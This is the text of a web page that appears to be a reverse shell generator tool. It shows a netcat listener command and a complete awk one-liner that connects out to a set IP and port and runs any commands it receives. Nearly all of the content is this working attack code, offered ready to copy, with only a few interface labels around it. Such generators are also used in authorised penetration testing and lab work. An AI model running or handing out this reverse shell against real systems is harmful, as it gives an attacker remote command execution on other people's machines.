Another Reverse Shell Generator
IP and Port
Listener
busybox nc -lp 1337
Copied to Clipboard
Copied to Clipboard
awk 'BEGIN {s = "/inet/tcp/0/127.0.0.1/1337"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null